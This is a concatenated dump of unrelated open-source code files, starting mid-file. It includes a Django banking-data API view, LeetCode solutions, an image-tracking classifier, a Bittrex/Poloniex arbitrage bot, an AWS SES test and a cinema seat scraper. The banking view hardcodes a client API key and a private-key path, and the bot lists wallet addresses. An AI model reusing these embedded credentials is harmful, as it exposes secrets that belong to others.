datetime\n expiry = time.time()\n data = {\n \"ver\": \"1.0\",\n \"timestamp\": dateNow.now().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\"),\n \"txnid\": str(uuid.uuid4()),\n \"ConsentDetail\": {\n \"consentStart\": dateNow.now().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\"),\n \"consentExpiry\": \"2021-12-03T14:25:33.440Z\",\n \"consentMode\": \"VIEW\",\n \"fetchType\": \"ONETIME\",\n \"consentTypes\": [\"TRANSACTIONS\", \"PROFILE\", \"SUMMARY\"],\n \"fiTypes\": [\"DEPOSIT\", \"MUTUAL_FUNDS\"],\n \"DataConsumer\": {\"id\": \"1fbad2f2-ce8c-4127-b24b-df360f57b06c\"},\n \"Customer\": {\"id\": mobileNumber + \"@setu-aa\"},\n \"Purpose\": {\n \"code\": \"101\",\n \"refUri\": \"https://api.rebit.org.in/aa/purpose/101.xml\",\n \"text\": \"Wealth management service\",\n \"Category\": {\"type\": \"string\"},\n },\n \"FIDataRange\": {\n \"from\": \"2021-1-06T11:39:57.153Z\",\n \"to\": \"2021-06-30T14:25:33.440Z\",\n },\n \"DataLife\": {\"unit\": \"MONTH\", \"value\": 0},\n \"Frequency\": {\"unit\": \"MONTH\", \"value\": 100},\n \"DataFilter\": [\n {\n \"type\": \"TRANSACTIONAMOUNT\",\n \"operator\": \">=\",\n \"value\": \"0\",\n },\n ],\n },\n }\n return data\n\n\ndef makeDetachedJWS(privateKey, body):\n\n encoded = jwt.encode(body, privateKey, algorithm=\"RS256\")\n encoded = encoded.split(\".\")\n encoded[1] = \"\"\n return \".\".join(encoded)\n\n\ndef fetchSignedConsent(consentId):\n privateKey = codecs.open(\n \"/home/radhika/hfi/prthvi/server/api/keys/private_key.pem\", encoding=\"utf-8\").read()\n detachedJWS = makeDetachedJWS(privateKey, {\"Consent\": consentId})\n url = \"https://aa-sandbox.setu.co/Consent/\" + consentId\n headers = {\n \"Content-Type\": \"application/json\",\n \"client_api_key\": \"bac41217-a584-4f79-bd79-5285adb61037\",\n \"x-jws-signature\": detachedJWS,\n }\n response = requests.get(url, headers=headers)\n response = response.json()\n fiDataRequest(response[\"signedConsent\"], consentId)\n\n\ndef fiDataRequest(signedConsent, consentId):\n keys = generateKeyMaterial()\n requestBody = requestDataBody(\n signedConsent, consentId, keys[\"KeyMaterial\"])\n privateKey = codecs.open(\n \"/home/radhika/hfi/prthvi/server/api/keys/private_key.pem\", encoding=\"utf-8\").read()\n detachedJWS = makeDetachedJWS(privateKey, requestBody)\n url = \"https://aa-sandbox.setu.co/FI/request\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"client_api_key\": \"bac41217-a584-4f79-bd79-5285adb61037\",\n \"x-jws-signature\": detachedJWS,\n }\n data = requestBody\n response = requests.post(url, headers=headers, json=data)\n response = response.json()\n fiDataFetch(response[\"sessionId\"],\n keys[\"privateKey\"], keys[\"KeyMaterial\"])\n\n\ndef generateKeyMaterial():\n url = \"https://rahasya.setu.co/ecc/v1/generateKey\"\n response = requests.get(url)\n response = response.json()\n return response\n\n\ndef requestDataBody(signedConsent, consent_id, keys):\n dateNow = datetime\n data = {\n \"ver\": \"1.0\",\n \"timestamp\": dateNow.now().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\"),\n \"txnid\": str(uuid.uuid4()),\n \"FIDataRange\": {\n \"from\": \"2021-1-06T11:39:57.153Z\",\n \"to\": \"2021-06-30T14:25:33.440Z\",\n },\n\n \"Consent\": {\n \"id\": consent_id,\n \"digitalSignature\": signedConsent.split(\".\")[2],\n },\n \"KeyMaterial\": keys,\n }\n return data\n\n\ndef fiDataFetch(session_id, encryption_privateKey, keyMaterial):\n privateKey = codecs.open(\n \"/home/radhika/hfi/prthvi/server/api/keys/private_key.pem\", encoding=\"utf-8\").read()\n detachedJWS = makeDetachedJWS(privateKey, {\"a\": \"b\"})\n url = \"https://aa-sandbox.setu.co/FI/fetch/\" + session_id\n headers = {\n \"Content-Type\": \"application/json\",\n \"client_api_key\": \"bac41217-a584-4f79-bd79-5285adb61037\",\n \"x-jws-signature\": detachedJWS,\n }\n response = requests.get(url, headers=headers)\n response = response.json()\n decryptData(response[\"FI\"], encryption_privateKey, keyMaterial)\n\n\ndef decryptData(fi, privateKey, keyMaterial):\n fi_data = fi[0]\n body = {\n \"base64Data\": fi_data[\"data\"][0][\"encryptedFI\"],\n \"base64RemoteNonce\": fi_data[\"KeyMaterial\"][\"Nonce\"],\n \"base64YourNonce\": keyMaterial[\"Nonce\"],\n \"ourPrivateKey\": privateKey,\n \"remoteKeyMaterial\": fi_data[\"KeyMaterial\"],\n }\n url = \"https://rahasya.setu.co/ecc/v1/decrypt\"\n data = body\n response = requests.post(url, json=data)\n response = response.json()\n base64Data = response[\"base64Data\"]\n b64_str = base64Data.encode('ascii')\n b64_bytes = base64.b64decode(b64_str)\n data = b64_bytes.decode('ascii')\n data = json.loads(data)\n\n print(\"LALALALlalalallALLA\")\n print(data)\n\n if User.objects.filter(accountNumber = data[\"account\"][\"maskedAccNumber\"]).exists():\n ###Update User###\n user = User.objects.get(accountNumber = data[\"account\"][\"maskedAccNumber\"])\n user.userName = data[\"account\"][\"profile\"][\"holders\"][\"holder\"][\"name\"]\n user.balance = data[\"account\"][\"summary\"][\"currentBalance\"]\n user.save()\n else:\n ###Create User###\n accountData = {\n \"accountNumber\": data[\"account\"][\"maskedAccNumber\"],\n \"userName\": data[\"account\"][\"profile\"][\"holders\"][\"holder\"][\"name\"],\n \"balance\": data[\"account\"][\"summary\"][\"currentBalance\"]\n }\n serializer = UserSerializer(data=accountData)\n if serializer.is_valid():\n serializer.save()\n \n for i in data[\"account\"][\"transactions\"][\"transaction\"]:\n \n if Transaction.objects.filter(accountNumber = data[\"account\"][\"maskedAccNumber\"]).exists():\n ###Update Transaction###\n txn = Transaction.objects.get(accountNumber = data[\"account\"][\"maskedAccNumber\"])\n txn.mode = i[\"mode\"]\n txn.type = i[\"type\"]\n txn.txnId = i[\"txnId\"]\n txn.amount = i[\"amount\"]\n txn.narration = i[\"narration\"]\n txn.valueDate = i[\"valueDate\"]\n txn.balance = i[\"currentBalance\"]\n txn.save()\n else:\n ###Create Transaction###\n transactionData = {\n \"accountNumber\": data[\"account\"][\"maskedAccNumber\"],\n \"mode\": i[\"mode\"],\n \"type\": i[\"type\"],\n \"txnId\": i[\"txnId\"],\n \"amount\": i[\"amount\"],\n \"narration\": i[\"narration\"],\n \"valueDate\": i[\"valueDate\"],\n \"balance\": i[\"currentBalance\"]\n }\n serializer = TransactionSerializer(data=transactionData)\n if serializer.is_valid():\n serializer.save()\n\nclass viewTxn(APIView):\n def get(self, request):\n queryset = Transaction.objects.all().values()\n array = []\n for i in queryset:\n if i[\"valueDate\"].split(\"-\")[1] == \"06\" and i[\"type\"] == \"DEBIT\":\n array.append(i)\n return Response(array)\n\n\nclass get1per(APIView):\n\n def get(self, request):\n txn = Transaction.objects.filter(\n valueDate=\"2021-06-08\").values(\"amount\")[0][\"amount\"]\n txn = txn/100\n return Response(txn)\n\n\nclass getGoal(ListAPIView):\n queryset = Goal.objects.all()\n serializer_class = GoalSerializer\n\nclass editGoal(APIView):\n def put(self,request):\n CauseType = request.data.get('causeType')\n DonationItem = request.data.get('donationItem')\n ItemQuantity = request.data.get('itemQuantity')\n ItemPrice = request.data.get('itemPrice')\n if Goal.objects.filter(donationItem = DonationItem).exists():\n ###Update Goal###\n goal = Goal.objects.get(donationItem = DonationItem)\n goal.causeType = CauseType\n goal.itemQuantity = ItemQuantity\n goal.itemPrice = ItemPrice\n goal.save()\n else:\n ###Create Goal###\n goalData = {\n \"causeType\": CauseType,\n \"donationItem\": DonationItem,\n \"itemQuantity\": ItemQuantity,\n \"itemPrice\": ItemPrice,\n }\n serializer = GoalSerializer(data=goalData)\n if serializer.is_valid():\n serializer.save()\n return Response()\n\nclass viewUserData(ListAPIView):\n queryset = User.objects.all()\n serializer_class = UserSerializer","repo_name":"RadhikaSheth/Prthvi","sub_path":"server/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"32579607594","text":"#\n# @lc app=leetcode.cn id=790 lang=python3\n#\n# [790] 多米诺和托米诺平铺\n#\n\n# @lc code=start\nclass Solution:\n def numTilings(self, n: int) -> int:\n MOD = 10 ** 9 + 7\n dp = [[0] * 4 for _ in range(n + 1)]\n dp[0][3] = 1\n for i in range(1, n + 1):\n dp[i][0] = dp[i - 1][3]\n dp[i][1] = (dp[i - 1][0] + dp[i - 1][2]) % MOD\n dp[i][2] = (dp[i - 1][0] + dp[i - 1][1]) % MOD\n dp[i][3] = (((dp[i - 1][0] + dp[i - 1][1]) % MOD + dp[i - 1][2]) % MOD + dp[i - 1][3]) % MOD\n return dp[n][3]\n# @lc code=end\n\n","repo_name":"Phil2ng/LeetCode","sub_path":"790.多米诺和托米诺平铺.py","file_name":"790.多米诺和托米诺平铺.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"24011971044","text":"class Solution(object):\n def searchInsert(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n \n if len(nums)==0:\n return 0\n else:\n start = 0\n end = len(nums)-1\n mid = (start+end)/2\n # print(start,mid,end)\n while (end-start)>2:\n print(nums[start],nums[mid],nums[end])\n if nums[mid]=target:\n return start\n elif nums[end]list:\n\n xmin,xmax,ymin,ymax,mat=self.mini_img(img)\n img=img[ymin:ymax,xmin:xmax]\n img1=img.copy()\n img1=cv.cvtColor(img,cv.COLOR_BGR2HSV)\n img1[mat!=255]=[0,0,0]\n # B,G,R=cv.split(img1)\n # #hhh=img.copy()\n # R[R!=0]=0\n # G[G!=0]=0\n # hhh=cv.merge([B,G,R])\n if see_make:\n cv.imshow('rrr',mat)\n cv.imshow('ooo',img)\n cv.imshow('ppp',img1)\n #cv.imshow('yyy',hhh)\n #cv.imshow('uuu',mmm)\n cv.waitKey(0) \n cv.destroyAllWindows()\n\n hist1 = cv.calcHist([img1],[0], None, [15], [1.0,255.0])\n #hist2 = cv.calcHist([img1],[1], None, [3], [1.0,255.0])\n hist3 = cv.calcHist([img1],[2], None, [5], [1.0,255.0])\n #print(hist6)\n\n hist1=hist1/np.sum(hist1)\n #hist2=hist2/np.sum(hist2)\n hist3=hist3/np.sum(hist3)\n hist=np.concatenate((hist1,hist3),axis=0)\n return hist,mat,(xmin,xmax,ymin,ymax)\n\ndef init_get_video(classname,video_name,num_of_photo,path,update_data=False):\n flag=0\n try:\n os.mkdir(os.path.join(path,video_name))\n except Exception as Error:\n print(Error)\n flag=1\n for i in classname:\n try:\n length=len(os.listdir(os.path.join(path,video_name,i)))\n except Exception as Error:\n flag=0\n break\n if length.2f}\".format(sum(fps)/len(fps)))\n return acc\n\n KKK=KNNClassifier(video_name,modelpath)\n test_path=os.path.join(modelpath,video_name+'_test')#\"./knn_classes/train_it2/\"\n acc=test(test_path,KKK)\n print(acc)\n\n","repo_name":"chenzhike110/Fast-tracking","sub_path":"ORBmin.py","file_name":"ORBmin.py","file_ext":"py","file_size_in_byte":10605,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"}
+{"seq_id":"28655868508","text":"# -*- coding: utf-8 -*-\nimport telegram\nimport time\nimport sys\nimport config\nfrom exchage_api.bittrex import bittrex\nfrom exchage_api.poloniex import poloniex\nimport util\n\n# 변수선언\nmarketcurrency = config.markgetcurrency # 기준코인\n#altcurrency = config.altcurrency # 알트코인\naltcurrency = 'DGB' # 알트코인\nspread = 0.8 # 차이 0.8%\nbittrex_market = '{0}-{1}'.format(marketcurrency, altcurrency)\npoloniex_market = '{0}_{1}'.format(marketcurrency, altcurrency)\nis_marketcurrency_transfering = False\nis_altcurrency_transfering = False\nbittrex_api = config.bittrex_api\nbittrex_key = config.bittrex_key\npoloniex_api = config.poloniex_api\npoloniex_key = config.poloniex_key\nbittrex_marketcurrency_bal = 0\npoloniex_marketcurrency_bal = 0\nbittrex_altcurrency_bal = 0\npoloniex_altcurrency_bal = 0\nbittrex_marketcurrency_address = '1DAFcmkeQiMWdhAmwKBLmx9pUpM4yak4DC'\npoloniex_marketcurrency_address = '1J4LrydHhH356J1ykvbXVDsj4a2s2497PP'\nbittrex_altcurrency_address = 'DPCgJ15dvMSTVvSKUX1LU1s4RZs5Dk2T8H'\npoloniex_altcurrency_address = 'DBCLd1NZpKFjc8eo2RgyWL43a6zBkCqTLP'\ntelegram_token = config.telegram_token\ntelegram_chat_id = config.telegram_chat_id\nspread = 0.8 # %\nspread = spread / 100\nbot = telegram.Bot(token=telegram_token)\n# API 객채생성\nbitt = bittrex(bittrex_api, bittrex_key)\npolo = poloniex(poloniex_api, poloniex_key)\n\n\ndef send_message(msg=None):\n print(msg)\n #bot.sendMessage(chat_id=telegram_chat_id, text=msg)\n\n\ndef send_message_with_error(message=None):\n msg = f\"⚠️ Error - wait 10 min\\n{0}\".format(message)\n print(msg)\n bot.sendMessage(chat_id=telegram_chat_id, text=msg)\n\n\n# 잔고조정\ndef balancing():\n global bittrex_marketcurrency_bal\n global poloniex_marketcurrency_bal\n global bittrex_altcurrency_bal\n global poloniex_altcurrency_bal\n global is_marketcurrency_transfering\n global is_altcurrency_transfering\n\n # 이체 중 인지 판단\n # 송금하면 송금플래그를 true 로변경\n # 송금전의 잔액 기억하고 있다가 송금한 금액만큼(수수료 감안) 증가하면 이체완료로 간주한다\n\n is_marketcurrency_transfering = False\n if not is_marketcurrency_transfering:\n # Market Currency 잔고 조회\n try:\n bittrex_marketcurrency_bal = float(bitt.getbalance(marketcurrency)['Available'])\n except:\n print('bittrex get balance error-{0}'.format(bitt.getbalance(marketcurrency)['Available']))\n bittrex_marketcurrency_bal = 0\n try:\n poloniex_marketcurrency_bal = float(polo.returnBalances()[marketcurrency])\n except:\n print('poloniex get balance error-{0}'.format(polo.returnBalances()[marketcurrency]))\n poloniex_marketcurrency_bal = 0\n total_marketcurrency_bal = bittrex_marketcurrency_bal + poloniex_marketcurrency_bal\n print('bittrex : {0:8f}{1} / poloniex : {2:8f}{3}'.format(bittrex_marketcurrency_bal, marketcurrency, poloniex_marketcurrency_bal, marketcurrency))\n\n # Market Currency 잔고 조정\n if bittrex_marketcurrency_bal / total_marketcurrency_bal > 0.8:\n try:\n transfer_amount = bittrex_marketcurrency_bal - (total_marketcurrency_bal / 2)\n #bitt.withdraw(marketcurrency, transfer_amount, poloniex_marketcurrency_address)\n send_message('withdraw to Poloniex : {0:8f}{1}'.format(transfer_amount, marketcurrency))\n except:\n send_message_with_error('error')\n if poloniex_marketcurrency_bal / total_marketcurrency_bal > 0.8:\n try:\n transfer_amount = poloniex_marketcurrency_bal - (total_marketcurrency_bal / 2)\n #polo.withdraw(marketcurrency, transfer_amount, bittrex_marketcurrency_address)\n send_message('withdraw to Bittrex : {0:8f}{1}'.format(transfer_amount, marketcurrency))\n except:\n send_message_with_error('error')\n\n # Alt Currency 잔고 확인\n is_altcurrency_transfering = False\n if not is_altcurrency_transfering:\n try:\n bittrex_altcurrency_bal = float(bitt.getbalance(altcurrency)['Available'])\n except:\n bittrex_altcurrency_bal = 0\n try:\n poloniex_altcurrency_bal = float(polo.returnBalances()[altcurrency])\n except:\n poloniex_altcurrency_bal = 0\n total_altcurrency_bal = bittrex_altcurrency_bal + poloniex_altcurrency_bal\n print('bittrex : {0:8f}{1} / poloniex : {2:8f}{3} '.format(bittrex_altcurrency_bal, altcurrency, poloniex_altcurrency_bal, altcurrency))\n\n # Alt Currency 잔고 조정\n if bittrex_altcurrency_bal / total_altcurrency_bal > 0.8:\n try:\n transfer_amount = bittrex_altcurrency_bal - (total_altcurrency_bal / 2)\n #bitt.withdraw(altcurrency, transfer_amount, poloniex_altcurrency_address)\n send_message('withdraw to Poloniex : {0:8f}{1}'.format(transfer_amount, altcurrency))\n except:\n send_message_with_error('withdraw to Poloniex : {0:8f}{1}'.format(transfer_amount, altcurrency))\n if poloniex_altcurrency_bal / total_altcurrency_bal > 0.8:\n try:\n transfer_amount = poloniex_altcurrency_bal - (total_altcurrency_bal / 2)\n #polo.withdraw(altcurrency, transfer_amount, bittrex_altcurrency_address)\n send_message('withdraw to Bittrex : {0:8f}{1}'.format(transfer_amount, altcurrency))\n except:\n send_message_with_error('withdraw to Bittrex : {0:8f}{1}'.format(transfer_amount, altcurrency))\n\n\n# 오더북 조회\ndef getorderbook():\n # Bittrexx 오더북 조회\n #decimal.getcontext().prec = 8\n bittrex_orderbook = bitt.getorderbook(bittrex_market, 'both', 1)\n bittrex_buyorder = bittrex_orderbook['buy']\n bittrex_sellorder = bittrex_orderbook['sell']\n #print(bittrex_orderbook)\n poloniex_orderbook = polo.returnOrderBook(poloniex_market)\n poloniex_buyorder = poloniex_orderbook['bids']\n poloniex_sellorder = poloniex_orderbook['asks']\n #print(poloniex_orderbook)\n '''\n for order in bittrex_buyorder:\n print(float(order['Rate'])*1000) #내림차순\n print(\"------------------------------------------\")\n for order in poloniex_buyorder: #내림차순\n print(order[0])\n \n for order in bittrex_sellorder:\n\n print(round(decimal.Decimal(bittrex_sellorder[0]['Rate']), 8)) #오름차순\n #round(decimal.Decimal(order['Rate']), 8)\n #print(\"------------------------------------------\")\n for order in poloniex_sellorder: #오름차순\n print(decimal.Decimal(order[0]))\n \n print(util.toSatoshi(bittrex_sellorder[0]['Rate']), bittrex_sellorder[0]['Quantity'])\n print(util.toSatoshi(poloniex_buyorder[0][0]), poloniex_buyorder[0][1])\n print(util.toSatoshi(bittrex_sellorder[0]['Rate'] - float(poloniex_buyorder[0][0])))\n '''\n bittrex_current_sell = util.toSatoshi(bittrex_sellorder[0]['Rate'])\n bittrex_current_buy = util.toSatoshi(bittrex_buyorder[0]['Rate'])\n poloniex_current_sell = util.toSatoshi(poloniex_sellorder[0][0])\n poloniex_current_buy = util.toSatoshi(poloniex_buyorder[0][0])\n print('Bittrex buy:', bittrex_current_buy, marketcurrency, 'sell:', bittrex_current_sell, marketcurrency)\n print('Poloniex buy:', poloniex_current_buy, marketcurrency, 'sell:', poloniex_current_sell, marketcurrency)\n print('bitt:polo', 1 - bittrex_current_sell/poloniex_current_buy)\n print('polo:bitt', 1 - bittrex_current_sell / poloniex_current_buy)\n if poloniex_current_buy > bittrex_current_sell and 1 - bittrex_current_sell/poloniex_current_buy > spread:\n #print((1 - (bittrex_current_sell/poloniex_current_buy))*100, \"%\")\n print(u'💰 Difference : ', round((1 - (bittrex_current_sell / poloniex_current_buy)) * 100, 2), \"%\", ' / Buy at Bittrex!!')\n\n if bittrex_current_buy > poloniex_current_sell and 1 - poloniex_current_sell/bittrex_current_buy > spread:\n print(u'💰 Difference : ', round((1 - (poloniex_current_sell / bittrex_current_buy))*100, 2), \"%\", ' / Buy at Poloniex')\n\n##오더\n\n'''\nprint(polo.returnTicker())\n# Getting the BTC price for DGB\ncurrencysummary = bitt.getmarketsummary(market_bitt)\ncurrencyprice = currencysummary[0]['Last']\n#print ('The price for {0} is {1:.8f} {2}.'.format(currency, currencyprice, trade))\n\n# 전체 잔고조회\nbalances = bitt.getbalances()\nfor coin in balances:\n if coin['Balance'] == 0:\n continue\n print('{0} : {1:.8f}'.format(coin['Currency'], coin['Balance']))\n\n#dogebalance = bittApi.getbalance(currency)\n'''\n\nif __name__ == '__main__':\n #balancing()\n while True:\n try:\n getorderbook()\n time.sleep(10)\n except:\n print(\"⚠️ Bot paused during 1 min -\", sys.exc_info())\n time.sleep(60*1)\n print(\"🔆 Bot resumed\")\n","repo_name":"hobbit19/Arbitrage_BOT","sub_path":"trader.py","file_name":"trader.py","file_ext":"py","file_size_in_byte":8882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"69922697691","text":"from unittest import mock\n\nimport botocore.session\nfrom botocore.stub import Stubber\nfrom django.conf import settings\n\nimport project.apps.api.tasks\nfrom project.apps.api.tasks import send_email\n\n\ndef test_send_email(monkeypatch):\n email = \"user@example.com\"\n\n monkeypatch.setattr(settings, \"AWS_SES_EMAIL_SOURCE\", email)\n monkeypatch.setattr(settings, \"AWS_SES_REGION\", \"default\")\n\n ses_client = botocore.session.get_session().create_client(\n \"ses\", region_name=settings.AWS_SES_REGION\n )\n stubber = Stubber(ses_client)\n\n def client_mock(a, **kwargs):\n return ses_client\n\n boto3_mock = mock.Mock()\n boto3_mock.client = client_mock\n monkeypatch.setattr(project.apps.api.tasks, \"boto3\", boto3_mock)\n\n expected_response = {\"MessageId\": \"12345\"}\n\n subject = \"Welcoming\"\n body = \"Hi There!\"\n\n expected_args = {\n \"Source\": email,\n \"Destination\": {\"ToAddresses\": (email,)},\n \"Message\": {\n \"Subject\": {\"Data\": subject},\n \"Body\": {\"Text\": {\"Data\": body}},\n },\n }\n\n stubber.add_response(\"send_email\", expected_response, expected_args)\n stubber.activate()\n\n send_email((email,), subject=subject, body=body)\n","repo_name":"libdx/treasury","sub_path":"project/tests/integration/test_api/test_send_email.py","file_name":"test_send_email.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"74349044890","text":"import time\nimport requests\nimport json\nimport logging\nimport re\nimport urllib.parse\nfrom datetime import datetime\nfrom random import randint\nfrom typing import List, Optional\nimport aiohttp\nimport asyncio\nfrom bs4 import BeautifulSoup\nfrom requests_html import AsyncHTMLSession\nfrom datetime import date\n\nfrom cinemas.models import Cinema, ScraperTask, ShowtimeSeats\nfrom cinemas.models import Movie as DjangoMovie\nfrom common.models import Country\n\nsession = AsyncHTMLSession()\n\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"%(asctime)s [%(levelname)s] %(message)s\",\n handlers=[\n logging.FileHandler(\"./novocinemas.log\"),\n logging.StreamHandler()\n ]\n)\nMAIN_PAGE = \"https://reelcinemas.com/en-ae/\"\nTCPCONNECTOR_LIMIT = 50\nSESSION_TIMEOUT_SEC = 5200\n\nSLEEP_BEFORE_REQUESTS_SEC = 1\n# get movies for this day\nDAY = date.today().strftime('%Y-%m-%d')\n'''{\n movie : \n {mall_name : \n {\n exp : [1,2,3] - sold/empty\n }\n }\n}'''\nHEADERS = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36\"\n}\n\n\nasync def post_request(session: aiohttp.ClientSession, url: str,\n params: dict = None,\n data: dict = None,\n json: dict = None) -> Optional[str]:\n for i in range(3):\n try:\n async with session.post(url, params=params, data=data, json=json, timeout=120) as resp:\n logging.debug(f\"Loading data from {url}, params - {params}, data - {data}, json - {json}\")\n if resp.ok:\n return await resp.text()\n else:\n logging.error(f\"Page failed to load. Url - {resp.url}. Status code - {resp.status}. Trying again\")\n await asyncio.sleep(randint(5, 60))\n except asyncio.TimeoutError:\n logging.error(f\"Timeout Error. Url - {url}. Trying again\")\n continue\n except Exception as e:\n await asyncio.sleep(randint(5, 60))\n logging.error(f\"Error - {e}. Url - {url}. Trying again\")\n continue\n return None\n\n\nasync def get_html(session: aiohttp.ClientSession, url: str, params: dict = None):\n if params is None:\n params = {}\n\n while True:\n async with session.get(url, params=params) as resp:\n logging.debug(f\"Loading page {url}, params - {params}\")\n try:\n if resp.ok:\n return await resp.text()\n else:\n logging.error(f\"Page failed to load. Url - {resp.url}. Status code - {resp.status}. Trying again\")\n await asyncio.sleep(randint(5,30))\n except Exception as e:\n print(\"Insdie get_html execption..\")\n\n\ndef get_asp_net_cookie():\n url = \"https://reelcinemas.com/en-ae/\"\n time.sleep(SLEEP_BEFORE_REQUESTS_SEC)\n response = requests.get(url, headers=HEADERS, verify=False)\n asp_net_cookie = response.cookies['ASP.NET_SessionId']\n return asp_net_cookie\n\n\ndef extract_url_parts(onclick): ##get the movie id and title\n pattern = r'MovieDetailsPage\\(\"(.*?)\",\"(.*?)\"\\)'\n match = re.search(pattern, onclick)\n if match:\n return match.group(1), match.group(2)\n return None, None\n\n\nasync def get_movies(session: aiohttp.ClientSession): ##get movie name and url\n url = \"https://reelcinemas.com/en-ae/\"\n time.sleep(SLEEP_BEFORE_REQUESTS_SEC)\n response = await get_html(session, url)\n # if response.status_code == 200:\n # Save the response content to a file\n # with open('/Users/n.purushottam.lagad/Downloads/reel.txt','wb') as file:\n # file.write(response.content)\n # print(f\"Downloaded the response content\")\n soup = BeautifulSoup(response, 'html.parser')\n movie_items = soup.find_all('div', {'class': 'movie-item'})\n movies = []\n for movie_item in movie_items:\n try:\n movie_title = movie_item['id']\n language = soup.find('div', class_='duration-language').find_all('span')[-1].get_text(strip=True)\n movie_id, title_dashed = extract_url_parts(\n str(movie_item)) ## movie_id = group(1) and title_dashed = group(2)\n movie_url = f\"https://reelcinemas.com/en-ae/movie-details/{movie_id}/{title_dashed}\" ##movie_id = HO00003413 & title_dashed = Fast-X-\n movies.append((movie_title, movie_url, movie_id, language))\n except:\n pass\n print(f\"movies_len : {len(movies)}\")\n return movies\n\n\ndef get_movie_session(asp_net_cookie, magic_string):\n url = \"https://reelcinemas.com/WebApi/api/UserAPI/CreateMovieCookie\"\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36\",\n \"Content-Type\": \"application/json\",\n \"ASP.NET_SessionId\": asp_net_cookie\n }\n # time.sleep(SLEEP_BEFORE_REQUESTS_SEC)\n response = requests.post(url=url, headers=headers, data='\"' + magic_string + '\"', verify=False)\n movie_session = response.cookies['movieSession']\n return movie_session\n\n\ndef extract_num_empty(input_str):\n pattern = r'status:empty'\n matches = re.findall(pattern, input_str)\n return len(matches)\n\n\ndef extract_num_sold(input_str):\n pattern = r'status:sold'\n matches = re.findall(pattern, input_str)\n return len(matches)\n\n\ndef extract_experience(input_str):\n return input_str['Experience']\n # exp = input_str['cinemaConfig']\n # experience = exp['ComboSeatSelection']['Experiences'][0]\n # return experience\n\n\nasync def get_seating_info(session: aiohttp.ClientSession):\n url = \"https://reelcinemas.com/WebApi/api/SeatLayourAPI/GetSeatLayout\"\n # cookies = {\n # \"ASP.NET_SessionId\": asp_net_cookie,\n # \"movieSession\": movie_session,\n # }\n response = await get_html(session, url)\n t = json.loads(response)\n experience = extract_experience(t)\n area_entity_list = t[\"Sourcedata\"][\"AreaEntityList\"]\n ticket_list = t.get(\"Sourcedata\").get(\"TicketList\", [])\n seats_list = []\n if area_entity_list:\n for area_entity in area_entity_list:\n area_code = area_entity[\"AreaCode\"]\n area_description = area_entity[\"AreaDescription\"]\n row_entity_list = area_entity[\"rowEntityList\"]\n\n empty_count = sum(1 for row_entity in row_entity_list for seat_entity in row_entity[\"seatEntityList\"] if\n seat_entity[\"Status\"] == \"Empty\")\n sold_count = sum(1 for row_entity in row_entity_list for seat_entity in row_entity[\"seatEntityList\"] if\n seat_entity[\"Status\"] == \"Sold\")\n for ticket in ticket_list:\n if ticket[\"AreaCode\"] == area_code:\n price_in_aed = ticket[\"PriceInAed\"]\n print(f\"AreaCode: {area_code}, AreaDescription: {area_description}\")\n print(f\"Empty Count: {empty_count}, Sold Count: {sold_count}, {price_in_aed}\")\n seats_price = [area_description, empty_count, sold_count, experience, price_in_aed]\n print(seats_price)\n seats_list.append(seats_price)\n return seats_list\n\n\n# async def get_seating_info(session: aiohttp.ClientSession):\n# try:\n# url = \"https://reelcinemas.com/WebApi/api/SeatLayourAPI/GetSeatLayout\"\n# response = await get_html(session, url)\n# t = json.loads(response)\n# experience = extract_experience(t)\n# s = response.replace('\"', '').lower()\n# num_empty = extract_num_empty(s)\n# num_sold = extract_num_sold(s)\n# ticket_list = t.get(\"Sourcedata\").get(\"TicketList\", [])\n# ticket_descriptions = [ticket[\"TicketDescription\"] for ticket in ticket_list]\n# ticket_prices = [ticket[\"PriceInAed\"] for ticket in ticket_list]\n# return num_empty, num_sold, experience, ticket_descriptions, ticket_prices\n# except Exception as e:\n# print(\"Inside get_seating_info exception\")\n# print(e)\n\n\nasync def get_seats(showtimes):\n seats = []\n try:\n magic_string = showtimes[-2]\n connector = aiohttp.TCPConnector(force_close=True, limit=TCPCONNECTOR_LIMIT)\n timeout = aiohttp.ClientTimeout(total=SESSION_TIMEOUT_SEC)\n\n # In order not to work with cookies manually, we start a new session.\n # Session cookies persist throughout the session. Same functionality in the requests.Session class\n async with aiohttp.ClientSession(connector=connector, headers=HEADERS, timeout=timeout) as new_session:\n url = \"https://reelcinemas.com/en-ae/\"\n await get_html(new_session, url)\n\n url = \"https://reelcinemas.com/WebApi/api/UserAPI/CreateMovieCookie\"\n await post_request(new_session, url, json=magic_string)\n seating_info = await get_seating_info(new_session)\n\n try:\n if seating_info:\n for sp in seating_info:\n num_empty = sp[1]\n num_sold = sp[2]\n seats_area = sp[0]\n num_total = num_empty + num_sold\n print(f\"{showtimes[1]}--{showtimes[2]}--{showtimes[3]}--{num_total}\")\n country = showtimes[0]\n movie_name = showtimes[1]\n cinema_title = showtimes[2]\n showtime = showtimes[3]\n scraping_date = showtimes[4]\n processing_date = showtimes[5]\n movie_language = showtimes[7]\n experience = sp[3]\n ticket_prices = sp[4]\n\n print(f\"{showtimes[1]}--{showtimes[2]}--{showtimes[3]}--{num_total}--{experience}--{ticket_prices}\")\n total = [country, movie_name, cinema_title, showtime, seats_area, num_total, num_sold, experience,\n ticket_prices, scraping_date, processing_date, movie_language]\n print(total)\n seats.append(total)\n return seats\n except Exception as e:\n 